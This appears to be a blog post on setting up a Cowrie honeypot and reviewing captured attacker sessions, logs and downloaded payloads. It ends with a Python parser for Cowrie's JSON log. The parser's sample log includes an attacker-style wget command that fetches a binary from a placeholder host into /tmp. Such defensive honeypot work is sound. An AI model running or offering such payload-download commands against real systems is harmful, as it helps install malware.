Cowrie is a powerful platform for establishing a honeypot. The honeypot can be used to attract attackers and bots and record all of their movement within the virtual environment as they traverse it. Most notably, the honeypot will capture and download any payloads that are run in the environment. This creates the opportunity for malware analysis of the payloads in a secure environment.
Cowrie can be installed by following the official installation guide: https://cowrie.readthedocs.io/en/latest/INSTALL.html
My Cowrie honeypot runs openly on the internet on a virtual machine in the cloud. This approach eliminates the need to expose my personal network to attackers while still letting me safely monitor and study the tactics of threat actors. The VM runs with the following specifications:
- OS: Ubuntu x64
- vCPUs: 1 vCPU
- Storage: 25 GB NVMe
Cowrie running on my cloud VM (bin/cowrie status)
Honeypot activity is logged into daily folders which are used to review the activities as they happen on the honeypot. These logs can be useful for correlating events based on time when forwarded to a SIEM tool.
Log captures of attacker activity (logs at: /cowrie/var/log/cowrie)
Cowrie will record each SSH/Telnet session that is opened by attackers. These sessions can be played back to perform a live analysis of the exact actions performed by the threat actor, and can reveal useful information such as the commands run by the attacker and any IP addresses used to download malware onto the honeypot server.
Recorded sessions available for playback on my honeypot (/cowrie/var/lib/cowrie/tty):
Playback - threat actor commands captured and displayed for playback using the playlog command
The downloads folder contains any files that are downloaded to the honeypot server. These downloads can be further analyzed using a text editor or decompiled, and quarantined in a malware analysis lab to study the behavior of the malware when detonated.
Cowrie downloads folder displaying all the downloaded files from threat actors:
View payload downloaded to server by threat actor:
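As an added example (not code from this post or from the Cowrie project), the parser below reads the JSON event log described above and groups each session's login attempts, commands and payload downloads, which is the shape of data you would want in a SIEM. The field names follow Cowrie's JSON event schema; the log lines, addresses, session id and hash are constructed placeholders, and a deliberately truncated line is included to show that a corrupt entry is skipped rather than aborting the review.

```python
import json
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample in the shape of Cowrie's JSON log (cowrie.json); the
# addresses, session id and hash are placeholders, not data from this honeypot.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"a1b2c3d4","timestamp":"2024-01-01T10:00:00Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.7","session":"a1b2c3d4"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","src_ip":"198.51.100.7","session":"a1b2c3d4"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"198.51.100.7","session":"a1b2c3d4"}
{"eventid":"cowrie.command.input","input":"wget http://203.0.113.9/x86 -O /tmp/x86","src_ip":"198.51.100.7","session":"a1b2c3d4"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.9/x86","outfile":"var/lib/cowrie/downloads/deadbeef","shasum":"deadbeef","src_ip":"198.51.100.7","session":"a1b2c3d4"}
{"eventid":"cowrie.command.input","input":"this line was cut off mid-write
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.7","session":"a1b2c3d4"}
"""

def parse_cowrie_log(text):
    """Group Cowrie JSON events by session id; malformed lines are skipped, not fatal."""
    sessions = defaultdict(lambda: {"src_ip": None, "creds": None,
                                    "failed_logins": [], "commands": [], "downloads": []})
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except ValueError:
            continue  # a truncated line must not abort the whole day's review
        sid = ev.get("session")
        if not sid:
            continue
        s = sessions[sid]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid")
        if eid == "cowrie.login.failed":
            s["failed_logins"].append((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.login.success":
            s["creds"] = (ev.get("username"), ev.get("password"))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append({"url": ev.get("url"), "shasum": ev.get("shasum")})
    return dict(sessions)

def download_hosts(sessions):
    """Hosts that served payloads: the indicator to hand to blocklists or SIEM lookups."""
    return {urlparse(d["url"]).hostname
            for s in sessions.values() for d in s["downloads"] if d["url"]}

if __name__ == "__main__":
    for sid, s in parse_cowrie_log(SAMPLE_LOG).items():
        print(sid, s["src_ip"], s["creds"], s["commands"], s["downloads"])
```

Point `parse_cowrie_log` at the contents of a real cowrie.json file and the same grouping gives you, per session, the credentials that worked, every command typed and each download's URL and hash to match against the files in the downloads folder.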